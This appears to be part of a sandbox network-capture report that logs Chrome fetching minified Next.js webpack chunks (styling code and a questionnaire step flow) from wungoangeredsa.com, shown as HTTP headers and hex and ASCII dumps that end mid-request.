                                                                                                          2025-01-06 11:09:24 UTC387INData Raw: 31 37 63 0d 0a 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 39 39 36 30 30 5d 2c 7b 39 39 36 30 30 3a 66 75 6e 63 74 69 6f 6e 28 41 2c 65 2c 74 29 7b 74 2e 72 28 65 29 2c 65 2e 64 65 66 61 75 6c 74 3d 7b 73 72 63 3a 22 2f 5f 6e 65 78 74 2f 73 74 61 74 69 63 2f 6d 65 64 69 61 2f 66 5f 32 34 2e 61 30 62 30 34 62 33 39 2e 77 65 62 70 22 2c 68 65 69 67 68 74 3a 35 31 32 2c 77 69 64 74 68 3a 35 31 32 2c 62 6c 75 72 44 61 74 61 55 52 4c 3a 22 64 61 74 61 3a 69 6d 61 67 65 2f 77 65 62 70 3b 62 61 73 65 36 34 2c 55 6b 6c 47 52 6c 67 41 41 41 42 58 52 55 4a 51 56 6c 41 34 49 45 77 41 41 41 41 51 41 67
                                                                                                          Data Ascii: 17c"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[99600],{99600:function(A,e,t){t.r(e),e.default={src:"/_next/static/media/f_24.a0b04b39.webp",height:512,width:512,blurDataURL:"data:image/webp;base64,UklGRlgAAABXRUJQVlA4IEwAAAAQAg
                                                                                                          2025-01-06 11:09:24 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                          Data Ascii: 0


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          87192.168.2.450133104.18.2.44438188C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2025-01-06 11:09:24 UTC497OUTGET /_next/static/chunks/d6be0b89fa7aeaa3-1736072686539.cf6cc9096c69f504.js HTTP/1.1
                                                                                                          Host: wungoangeredsa.com
                                                                                                          Connection: keep-alive
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                          Accept: */*
                                                                                                          Sec-Fetch-Site: none
                                                                                                          Sec-Fetch-Mode: cors
                                                                                                          Sec-Fetch-Dest: empty
                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                          Cookie: OAID=1zy28050kovbfyyc4yz4gsq62pkmaxhb; syncedCookie=true; oaidts=1736161760
                                                                                                          2025-01-06 11:09:24 UTC496INHTTP/1.1 200 OK
                                                                                                          Date: Mon, 06 Jan 2025 11:09:24 GMT
                                                                                                          Content-Type: application/javascript
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: close
                                                                                                          Last-Modified: Sun, 05 Jan 2025 10:29:40 GMT
                                                                                                          Vary: Accept-Encoding
                                                                                                          ETag: W/"677a5f14-18a3"
                                                                                                          Strict-Transport-Security: max-age=1
                                                                                                          X-Content-Type-Options: nosniff
                                                                                                          CF-Cache-Status: HIT
                                                                                                          Age: 1057
                                                                                                          Expires: Mon, 06 Jan 2025 12:09:24 GMT
                                                                                                          Cache-Control: public, max-age=3600
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8fdb4173ce275e6c-EWR
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          2025-01-06 11:09:24 UTC873INData Raw: 31 38 61 33 0d 0a 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 31 37 32 32 30 5d 2c 7b 37 35 35 35 32 3a 66 75 6e 63 74 69 6f 6e 28 6e 2c 74 2c 72 29 7b 72 2e 64 28 74 2c 7b 69 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6f 7d 7d 29 3b 76 61 72 20 6f 3d 22 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 52 6f 62 6f 74 6f 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 22 7d 2c 36 36 32 33 36 3a 66 75 6e 63 74 69 6f 6e 28 6e 2c 74 2c 72 29 7b 76 61 72 20 6f 3b 72 2e 64 28 74 2c 7b 4f 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6f 7d 7d 29 2c 66 75 6e
                                                                                                          Data Ascii: 18a3"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[17220],{75552:function(n,t,r){r.d(t,{i:function(){return o}});var o="-apple-system, Roboto, Helvetica, sans-serif"},66236:function(n,t,r){var o;r.d(t,{O:function(){return o}}),fun
                                                                                                          2025-01-06 11:09:24 UTC1369INData Raw: 29 3b 72 65 74 75 72 6e 20 73 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6e 7d 2c 6e 7d 66 75 6e 63 74 69 6f 6e 20 70 28 29 7b 76 61 72 20 6e 3d 28 30 2c 66 2e 5a 29 28 5b 22 5c 6e 20 20 20 20 20 20 6c 65 66 74 3a 20 30 3b 5c 6e 20 20 20 20 20 20 72 69 67 68 74 3a 20 30 3b 5c 6e 20 20 20 20 22 5d 29 3b 72 65 74 75 72 6e 20 70 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6e 7d 2c 6e 7d 66 75 6e 63 74 69 6f 6e 20 4f 28 29 7b 76 61 72 20 6e 3d 28 30 2c 66 2e 5a 29 28 5b 22 5c 6e 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 31 66 34 66 37 3b 5c 6e 20 20 20 20 22 5d 29 3b 72 65 74 75 72 6e 20 4f 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6e 7d 2c 6e 7d 66 75 6e 63 74 69 6f 6e 20 76 28 29
                                                                                                          Data Ascii: );return s=function(){return n},n}function p(){var n=(0,f.Z)(["\n left: 0;\n right: 0;\n "]);return p=function(){return n},n}function O(){var n=(0,f.Z)(["\n background-color: #f1f4f7;\n "]);return O=function(){return n},n}function v()
                                                                                                          2025-01-06 11:09:24 UTC1369INData Raw: 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6e 7d 2c 6e 7d 66 75 6e 63 74 69 6f 6e 20 43 28 29 7b 76 61 72 20 6e 3d 28 30 2c 66 2e 5a 29 28 5b 22 5c 6e 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 22 2c 22 3b 5c 6e 5c 6e 20 20 61 20 7b 5c 6e 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 35 70 78 3b 5c 6e 20 20 7d 5c 6e 5c 6e 20 20 22 2c 22 3b 5c 6e 20 20 22 2c 22 3b 5c 6e 5c 6e 20 20 22 2c 22 3b 5c 6e 5c 6e 20 20 22 2c 22 3b 5c 6e 22 5d 29 3b 72 65 74 75 72 6e 20 43 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6e 7d 2c 6e 7d 66 75 6e 63 74 69 6f 6e 20 4c 28 29 7b 76 61 72 20 6e 3d 28 30 2c 66 2e 5a 29 28 5b 22 5c 6e 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 32 31 32 35 32 39 3b 5c 6e 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20
                                                                                                          Data Ascii: ion(){return n},n}function C(){var n=(0,f.Z)(["\n font-size: ",";\n\n a {\n margin-left: 5px;\n }\n\n ",";\n ",";\n\n ",";\n\n ",";\n"]);return C=function(){return n},n}function L(){var n=(0,f.Z)(["\n color: #212529;\n background:
                                                                                                          2025-01-06 11:09:24 UTC1369INData Raw: 29 3b 5c 6e 20 20 77 69 64 74 68 3a 20 33 30 70 78 3b 5c 6e 22 5d 29 3b 72 65 74 75 72 6e 20 24 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6e 7d 2c 6e 7d 66 75 6e 63 74 69 6f 6e 20 6d 28 29 7b 76 61 72 20 6e 3d 28 30 2c 66 2e 5a 29 28 5b 22 5c 6e 20 20 64 69 73 70 6c 61 79 3a 20 66 6c 65 78 3b 5c 6e 20 20 67 61 70 3a 20 31 30 70 78 3b 5c 6e 20 20 6d 61 72 67 69 6e 3a 20 61 75 74 6f 3b 5c 6e 20 20 6d 61 78 2d 77 69 64 74 68 3a 20 22 2c 22 3b 5c 6e 22 5d 29 3b 72 65 74 75 72 6e 20 6d 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6e 7d 2c 6e 7d 76 61 72 20 77 3d 61 2e 5a 50 2e 64 69 76 2e 77 69 74 68 43 6f 6e 66 69 67 28 7b 63 6f 6d 70 6f 6e 65 6e 74 49 64 3a 22 73 63 2d 61 39 34 39 62 36 64 2d 30 22 7d 29 28 5f 28 29 2c 28 66 75 6e
                                                                                                          Data Ascii: );\n width: 30px;\n"]);return $=function(){return n},n}function m(){var n=(0,f.Z)(["\n display: flex;\n gap: 10px;\n margin: auto;\n max-width: ",";\n"]);return m=function(){return n},n}var w=a.ZP.div.withConfig({componentId:"sc-a949b6d-0"})(_(),(fun
                                                                                                          2025-01-06 11:09:24 UTC1335INData Raw: 34 39 62 36 64 2d 32 22 7d 29 28 6b 28 29 2c 28 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 72 65 74 75 72 6e 20 6e 2e 24 64 65 73 69 67 6e 3d 3d 3d 65 2e 4f 2e 4c 49 47 48 54 26 26 28 30 2c 61 2e 69 76 29 28 4c 28 29 29 7d 29 2c 28 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 72 65 74 75 72 6e 20 6e 2e 24 64 65 73 69 67 6e 3d 3d 3d 65 2e 4f 2e 42 4c 55 45 26 26 28 30 2c 61 2e 69 76 29 28 5a 28 29 29 7d 29 2c 28 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 76 61 72 20 74 3d 6e 2e 24 64 65 73 69 67 6e 3b 72 65 74 75 72 6e 28 74 3d 3d 3d 65 2e 4f 2e 44 41 52 4b 7c 7c 74 3d 3d 3d 65 2e 4f 2e 44 41 52 4b 5f 43 4c 4f 53 45 5f 49 43 4f 4e 29 26 26 28 30 2c 61 2e 69 76 29 28 49 28 29 29 7d 29 29 2c 44 3d 61 2e 5a 50 2e 64 69 76 2e 77 69 74 68 43 6f 6e 66 69 67 28 7b 63 6f 6d 70 6f 6e 65
                                                                                                          Data Ascii: 49b6d-2"})(k(),(function(n){return n.$design===e.O.LIGHT&&(0,a.iv)(L())}),(function(n){return n.$design===e.O.BLUE&&(0,a.iv)(Z())}),(function(n){var t=n.$design;return(t===e.O.DARK||t===e.O.DARK_CLOSE_ICON)&&(0,a.iv)(I())})),D=a.ZP.div.withConfig({compone
                                                                                                          2025-01-06 11:09:24 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                          Data Ascii: 0


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          88192.168.2.450136104.18.2.44438188C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2025-01-06 11:09:24 UTC497OUTGET /_next/static/chunks/621e8925e817e462-1736072686539.fe6846fd6e13d76b.js HTTP/1.1
                                                                                                          Host: wungoangeredsa.com
                                                                                                          Connection: keep-alive
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                          Accept: */*
                                                                                                          Sec-Fetch-Site: none
                                                                                                          Sec-Fetch-Mode: cors
                                                                                                          Sec-Fetch-Dest: empty
                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                          Cookie: OAID=1zy28050kovbfyyc4yz4gsq62pkmaxhb; syncedCookie=true; oaidts=1736161760
                                                                                                          2025-01-06 11:09:24 UTC496INHTTP/1.1 200 OK
                                                                                                          Date: Mon, 06 Jan 2025 11:09:24 GMT
                                                                                                          Content-Type: application/javascript
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: close
                                                                                                          Last-Modified: Sun, 05 Jan 2025 10:29:40 GMT
                                                                                                          Vary: Accept-Encoding
                                                                                                          ETag: W/"677a5f14-7072"
                                                                                                          Strict-Transport-Security: max-age=1
                                                                                                          X-Content-Type-Options: nosniff
                                                                                                          CF-Cache-Status: HIT
                                                                                                          Age: 1057
                                                                                                          Expires: Mon, 06 Jan 2025 12:09:24 GMT
                                                                                                          Cache-Control: public, max-age=3600
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8fdb4173cc59430d-EWR
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          2025-01-06 11:09:24 UTC873INData Raw: 37 30 37 32 0d 0a 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 37 34 37 36 34 5d 2c 7b 37 34 37 36 34 3a 66 75 6e 63 74 69 6f 6e 28 6e 2c 69 2c 6f 29 7b 6f 2e 72 28 69 29 3b 76 61 72 20 65 3d 6f 28 34 37 38 34 32 29 2c 74 3d 6f 28 37 30 38 36 35 29 2c 72 3d 6f 28 36 36 33 38 33 29 2c 75 3d 6f 28 35 36 37 35 33 29 2c 6c 3d 6f 28 32 35 32 33 37 29 2c 64 3d 6f 2e 6e 28 6c 29 2c 76 3d 6f 28 31 32 31 33 39 29 2c 73 3d 6f 28 35 34 39 38 33 29 2c 61 3d 6f 28 32 39 37 35 34 29 2c 63 3d 6f 28 34 36 38 38 39 29 2c 66 3d 6f 28 34 32 32 35 31 29 2c 6d 3d 6f 28 34 35 36 39 29 2c 68 3d 64 28 29 28 28 66 75
                                                                                                          Data Ascii: 7072"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[74764],{74764:function(n,i,o){o.r(i);var e=o(47842),t=o(70865),r=o(66383),u=o(56753),l=o(25237),d=o.n(l),v=o(12139),s=o(54983),a=o(29754),c=o(46889),f=o(42251),m=o(4569),h=d()((fu
                                                                                                          2025-01-06 11:09:24 UTC1369INData Raw: 3d 3d 67 3f 67 3a 22 22 2c 22 73 65 73 73 69 6f 6e 22 29 2c 32 29 2c 54 3d 48 5b 30 5d 2c 41 3d 48 5b 31 5d 2c 4c 3d 28 30 2c 72 2e 5a 29 28 28 30 2c 63 2e 75 29 28 22 73 74 61 72 74 51 54 69 6d 65 22 2c 44 61 74 65 2e 6e 6f 77 28 29 2c 22 73 65 73 73 69 6f 6e 22 29 2c 32 29 2c 4e 3d 4c 5b 30 5d 2c 52 3d 4c 5b 31 5d 2c 58 3d 28 30 2c 72 2e 5a 29 28 28 30 2c 63 2e 75 29 28 22 61 6e 73 77 65 72 73 4f 6e 51 75 65 73 74 69 6f 6e 73 22 2c 7b 7d 2c 22 73 65 73 73 69 6f 6e 22 29 2c 32 29 5b 31 5d 2c 5f 3d 28 30 2c 72 2e 5a 29 28 28 30 2c 63 2e 75 29 28 22 61 6e 73 77 65 72 73 4f 6e 51 75 65 73 74 69 6f 6e 73 4e 75 6d 62 65 72 22 2c 7b 7d 2c 22 73 65 73 73 69 6f 6e 22 29 2c 32 29 5b 31 5d 2c 46 3d 76 6f 69 64 20 30 21 3d 3d 71 2c 4f 3d 46 3f 71 3a 54 2c 55 3d 78
                                                                                                          Data Ascii: ==g?g:"","session"),2),T=H[0],A=H[1],L=(0,r.Z)((0,c.u)("startQTime",Date.now(),"session"),2),N=L[0],R=L[1],X=(0,r.Z)((0,c.u)("answersOnQuestions",{},"session"),2)[1],_=(0,r.Z)((0,c.u)("answersOnQuestionsNumber",{},"session"),2)[1],F=void 0!==q,O=F?q:T,U=x
                                                                                                          2025-01-06 11:09:24 UTC1369INData Raw: 6e 7c 7c 76 6f 69 64 20 30 3d 3d 3d 6e 3f 76 6f 69 64 20 30 3a 6e 2e 74 61 72 67 65 74 29 7c 7c 22 66 69 6e 61 6c 22 3d 3d 3d 28 6e 75 6c 6c 3d 3d 3d 55 7c 7c 76 6f 69 64 20 30 3d 3d 3d 55 3f 76 6f 69 64 20 30 3a 55 2e 6e 61 6d 65 29 3f 6e 75 6c 6c 3d 3d 3d 79 7c 7c 76 6f 69 64 20 30 3d 3d 3d 79 7c 7c 79 28 29 3a 28 75 3d 6e 75 6c 6c 3d 3d 3d 6e 7c 7c 76 6f 69 64 20 30 3d 3d 3d 6e 3f 76 6f 69 64 20 30 3a 6e 2e 74 61 72 67 65 74 2c 46 26 26 77 26 26 77 28 75 29 2c 41 28 75 29 29 2c 49 26 26 49 28 7b 63 75 72 72 65 6e 74 53 74 65 70 3a 55 2e 69 64 2c 6e 65 78 74 53 74 65 70 3a 75 2c 71 75 65 73 74 69 6f 6e 53 74 61 72 74 54 69 6d 65 3a 4e 2c 61 75 64 69 65 6e 63 65 49 64 3a 6e 75 6c 6c 3d 3d 3d 6e 7c 7c 76 6f 69 64 20 30 3d 3d 3d 6e 3f 76 6f 69 64 20 30 3a
                                                                                                          Data Ascii: n||void 0===n?void 0:n.target)||"final"===(null===U||void 0===U?void 0:U.name)?null===y||void 0===y||y():(u=null===n||void 0===n?void 0:n.target,F&&w&&w(u),A(u)),I&&I({currentStep:U.id,nextStep:u,questionStartTime:N,audienceId:null===n||void 0===n?void 0:
                                                                                                          2025-01-06 11:09:24 UTC1369INData Raw: 3d 55 2e 71 75 65 73 74 69 6f 6e 44 65 73 63 72 69 70 74 69 6f 6e 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 64 3f 76 6f 69 64 20 30 3a 64 2e 6d 61 70 28 28 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 72 65 74 75 72 6e 28 30 2c 75 2e 74 5a 29 28 22 70 22 2c 7b 63 68 69 6c 64 72 65 6e 3a 6e 7d 29 7d 29 29 29 5d 7d 29 7d 29 2c 28 6e 75 6c 6c 3d 3d 3d 55 7c 7c 76 6f 69 64 20 30 3d 3d 3d 55 3f 76 6f 69 64 20 30 3a 55 2e 62 6f 74 74 6f 6d 43 6f 6d 70 6f 6e 65 6e 74 29 26 26 28 6e 75 6c 6c 3d 3d 3d 55 7c 7c 76 6f 69 64 20 30 3d 3d 3d 55 3f 76 6f 69 64 20 30 3a 55 2e 62 6f 74 74 6f 6d 43 6f 6d 70 6f 6e 65 6e 74 29 2c 44 26 26 28 30 2c 75 2e 74 5a 29 28 6d 2e 42 49 2c 7b 6f 6e 43 6c 69 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 6e 2e 73 74 6f 70 50 72 6f 70 61 67 61 74 69 6f
                                                                                                          Data Ascii: =U.questionDescription)||void 0===d?void 0:d.map((function(n){return(0,u.tZ)("p",{children:n})})))]})}),(null===U||void 0===U?void 0:U.bottomComponent)&&(null===U||void 0===U?void 0:U.bottomComponent),D&&(0,u.tZ)(m.BI,{onClick:function(n){n.stopPropagatio
                                                                                                          2025-01-06 11:09:24 UTC1369INData Raw: 3b 5c 6e 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 22 2c 22 3b 5c 6e 20 20 62 6f 78 2d 73 68 61 64 6f 77 3a 20 22 2c 22 3b 5c 6e 20 20 62 6f 72 64 65 72 3a 20 22 2c 22 3b 5c 6e 20 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 22 2c 22 3b 5c 6e 20 20 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 22 2c 22 3b 5c 6e 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 22 2c 22 3b 5c 6e 20 20 66 6c 65 78 3a 20 22 2c 22 3b 5c 6e 20 20 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 20 22 2c 22 3b 5c 6e 20 20 64 69 73 70 6c 61 79 3a 20 22 2c 22 3b 5c 6e 20 20 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 20 22 2c 22 3b 5c 6e 20 20 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 20 22 2c 22 3b 5c 6e 20 20 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d
                                                                                                          Data Ascii: ;\n transform: ",";\n box-shadow: ",";\n border: ",";\n border-radius: ",";\n border-color: ",";\n background-color: ",";\n flex: ",";\n align-items: ",";\n display: ",";\n justify-content: ",";\n flex-direction: ",";\n @media screen and (min-
                                                                                                          2025-01-06 11:09:24 UTC1369INData Raw: 74 65 6e 74 3a 20 22 2c 22 3b 5c 6e 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 22 2c 22 3b 5c 6e 20 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 22 2c 22 3b 5c 6e 20 20 70 61 64 64 69 6e 67 3a 20 22 2c 22 3b 5c 6e 20 20 67 61 70 3a 20 22 2c 22 3b 5c 6e 20 20 70 6f 73 69 74 69 6f 6e 3a 20 22 2c 22 3b 5c 6e 20 20 74 6f 70 3a 20 22 2c 22 3b 5c 6e 20 20 6c 65 66 74 3a 20 22 2c 22 3b 5c 6e 20 20 72 69 67 68 74 3a 20 22 2c 22 3b 5c 6e 20 20 62 6f 74 74 6f 6d 3a 20 22 2c 22 3b 5c 6e 20 20 77 69 64 74 68 3a 20 22 2c 22 3b 5c 6e 20 20 6d 61 78 2d 77 69 64 74 68 3a 20 22 2c 22 3b 5c 6e 20 20 7a 2d 69 6e 64 65 78 3a 20 22 2c 22 3b 5c 6e 20 20 6d 61 72 67 69 6e 3a 20 22 2c 22 3b 5c 6e 5c 6e 20 20 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d
                                                                                                          Data Ascii: tent: ",";\n background: ",";\n border-radius: ",";\n padding: ",";\n gap: ",";\n position: ",";\n top: ",";\n left: ",";\n right: ",";\n bottom: ",";\n width: ",";\n max-width: ",";\n z-index: ",";\n margin: ",";\n\n @media screen and (min-
                                                                                                          2025-01-06 11:09:24 UTC1369INData Raw: 67 69 6e 3a 20 22 2c 22 3b 5c 6e 20 20 7d 5c 6e 20 20 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 77 69 64 74 68 3a 20 37 36 38 70 78 29 20 7b 5c 6e 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 22 2c 22 3b 5c 6e 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 22 2c 22 3b 5c 6e 20 20 20 20 6d 61 72 67 69 6e 3a 20 22 2c 22 3b 5c 6e 20 20 7d 5c 6e 20 20 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 77 69 64 74 68 3a 20 31 30 32 34 70 78 29 20 7b 5c 6e 20 20 20 20 6d 61 72 67 69 6e 3a 20 22 2c 22 3b 5c 6e 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 22 2c 22 3b 5c 6e 20 20 7d 5c 6e 22 5d 29 3b 72 65 74 75 72 6e 20 73 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6e 7d 2c 6e 7d 66 75 6e 63 74 69 6f
                                                                                                          Data Ascii: gin: ",";\n }\n @media screen and (min-width: 768px) {\n font-size: ",";\n line-height: ",";\n margin: ",";\n }\n @media screen and (min-width: 1024px) {\n margin: ",";\n font-size: ",";\n }\n"]);return s=function(){return n},n}functio
                                                                                                          2025-01-06 11:09:24 UTC1369INData Raw: 68 3a 20 22 2c 22 3b 5c 6e 20 20 7d 5c 6e 22 5d 29 3b 72 65 74 75 72 6e 20 63 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6e 7d 2c 6e 7d 66 75 6e 63 74 69 6f 6e 20 66 28 29 7b 76 61 72 20 6e 3d 28 30 2c 65 2e 5a 29 28 5b 22 5c 6e 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 22 2c 22 3b 5c 6e 20 20 6d 61 72 67 69 6e 3a 20 22 2c 22 3b 5c 6e 22 5d 29 3b 72 65 74 75 72 6e 20 66 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6e 7d 2c 6e 7d 66 75 6e 63 74 69 6f 6e 20 6d 28 29 7b 76 61 72 20 6e 3d 28 30 2c 65 2e 5a 29 28 5b 22 5c 6e 20 20 74 6f 70 3a 20 30 3b 5c 6e 20 20 6c 65 66 74 3a 20 30 3b 5c 6e 20 20 70 6f 73 69 74 69 6f 6e 3a 20 66 69 78 65 64 3b 5c 6e 20 20 77 69 64 74 68 3a 20 31 30 30 76 77 3b 5c 6e 20 20 68 65 69 67 68 74 3a 20 31 30
                                                                                                          Data Ascii: h: ",";\n }\n"]);return c=function(){return n},n}function f(){var n=(0,e.Z)(["\n font-size: ",";\n margin: ",";\n"]);return f=function(){return n},n}function m(){var n=(0,e.Z)(["\n top: 0;\n left: 0;\n position: fixed;\n width: 100vw;\n height: 10
                                                                                                          2025-01-06 11:09:24 UTC1369INData Raw: 3d 3d 3d 6f 3f 76 6f 69 64 20 30 3a 6f 2e 70 6f 73 69 74 69 6f 6e 29 7c 7c 22 69 6e 68 65 72 69 74 22 7d 29 2c 28 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 76 61 72 20 69 2c 6f 3b 72 65 74 75 72 6e 28 6e 75 6c 6c 3d 3d 3d 28 69 3d 6e 2e 74 68 65 6d 65 2e 71 75 65 73 74 69 6f 6e 73 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 69 7c 7c 6e 75 6c 6c 3d 3d 3d 28 6f 3d 69 2e 77 72 61 70 70 65 72 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 6f 3f 76 6f 69 64 20 30 3a 6f 2e 74 6f 70 29 7c 7c 22 61 75 74 6f 22 7d 29 2c 28 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 76 61 72 20 69 2c 6f 3b 72 65 74 75 72 6e 28 6e 75 6c 6c 3d 3d 3d 28 69 3d 6e 2e 74 68 65 6d 65 2e 71 75 65 73 74 69 6f 6e 73 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 69 7c 7c 6e 75 6c 6c 3d 3d 3d 28 6f 3d 69 2e 77 72 61 70 70 65 72 29 7c
                                                                                                          Data Ascii: ===o?void 0:o.position)||"inherit"}),(function(n){var i,o;return(null===(i=n.theme.questions)||void 0===i||null===(o=i.wrapper)||void 0===o?void 0:o.top)||"auto"}),(function(n){var i,o;return(null===(i=n.theme.questions)||void 0===i||null===(o=i.wrapper)|
                                                                                                          2025-01-06 11:09:24 UTC1369INData Raw: 7b 76 61 72 20 69 2c 6f 3b 72 65 74 75 72 6e 20 6e 75 6c 6c 3d 3d 3d 28 69 3d 6e 2e 74 68 65 6d 65 2e 71 75 65 73 74 69 6f 6e 73 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 69 7c 7c 6e 75 6c 6c 3d 3d 3d 28 6f 3d 69 2e 77 72 61 70 70 65 72 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 6f 3f 76 6f 69 64 20 30 3a 6f 2e 66 6c 65 78 7d 29 2c 28 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 76 61 72 20 69 2c 6f 3b 72 65 74 75 72 6e 20 6e 75 6c 6c 3d 3d 3d 28 69 3d 6e 2e 74 68 65 6d 65 2e 71 75 65 73 74 69 6f 6e 73 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 69 7c 7c 6e 75 6c 6c 3d 3d 3d 28 6f 3d 69 2e 77 72 61 70 70 65 72 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 6f 3f 76 6f 69 64 20 30 3a 6f 2e 61 6c 69 67 6e 49 74 65 6d 73 7d 29 2c 28 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 76 61 72 20 69 2c 6f 3b 72 65
                                                                                                          Data Ascii: {var i,o;return null===(i=n.theme.questions)||void 0===i||null===(o=i.wrapper)||void 0===o?void 0:o.flex}),(function(n){var i,o;return null===(i=n.theme.questions)||void 0===i||null===(o=i.wrapper)||void 0===o?void 0:o.alignItems}),(function(n){var i,o;re


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          89192.168.2.450138104.18.2.44438188C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2025-01-06 11:09:24 UTC638OUTGET /_next/static/chunks/d7be7898798e9f10-1736072686539.f4d9d083e15d3eef.js HTTP/1.1
                                                                                                          Host: wungoangeredsa.com
                                                                                                          Connection: keep-alive
                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
